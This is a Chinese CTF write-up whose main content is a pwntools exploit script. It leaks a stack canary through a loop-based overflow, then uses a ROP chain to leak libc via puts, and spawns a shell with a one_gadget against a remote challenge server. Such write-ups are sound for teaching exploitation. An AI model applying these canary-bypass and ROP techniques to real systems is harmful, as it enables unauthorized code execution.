同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。
这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复
from pwn import *
'''
patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
patchelf --add-needed /home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so pwn
'''
local = 0
if local == 1:
p = process('./pwn')
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830
else:
p = remote('111.200.241.244', 60088)
libc_elf = ELF('./libc-2.23.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830
elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'
pop_rdi = 0x0000000000400a93 # pop rdi ; ret
pop_rsi = 0x0000000000400a91 # pop rsi ; pop r15 ; ret
payload = b'A'*(0x88+1)
p.sendlineafter(b">> ", b'1')
p.send(payload) #将canary第1字符置A再show得到canary
p.sendlineafter(b">> ", b'2')
p.recvuntil(b'A'*(0x88+1))
canary = b'\x00' + p.recv(7)
print('canary:', hex(u64(canary)))
#再将rop写到返回地址,泄露libc
payload = b'A'*(0x88) + canary + b'\x00'*8 + flat(pop_rdi, elf.got['puts'], elf.plt['puts'], 0x400908)
p.sendlineafter(b">> ", b'1')
p.send(payload)
p.sendlineafter(b">> ", b'3')
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))
#最后写one_gadget
#payload = b'A'*(0x88) + canary + b'\x00'*8 + flat(pop_rdi+1, pop_rdi, next(libc_elf.search(b'/bin/sh\x00')),libc_elf.sym['system'])
payload = b'A'*(0x88) + canary + b'\x00'*8 + p64(libc_base + one[0])
p.sendlineafter(b">> ", b'1')
p.send(payload)
p.sendlineafter(b">> ", b'3')
p.sendline(b'cat flag')
p.interactive()
坑:这题在得到libc后写system(bin/sh)会报错,但写one_gadget能通过,没开理啊!
